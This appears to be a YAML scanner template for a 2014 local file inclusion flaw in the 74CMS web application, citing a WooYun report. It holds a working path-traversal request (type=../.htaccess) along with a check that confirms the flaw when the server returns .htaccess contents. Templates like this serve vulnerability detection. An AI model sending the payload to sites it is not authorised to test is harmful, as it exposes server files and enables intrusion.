product: 骑士74CMS
vName: 74cms local_file_include
type: 文件包含
vID: [ ]
level: 2
vDesc: 导致攻击者可包含文件
version: ''
note: ''
search: { }
protocol: http
link: http://wooyun.org/bugs/wooyun-2014-086882
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /index.php?m=&c=M&a=index&type=../.htaccess
    verify:
      logic: and
      check:
        - status: 200
        - body:
            value:
              - '%{REQUEST_FILENAME} !-d'
            logic: and
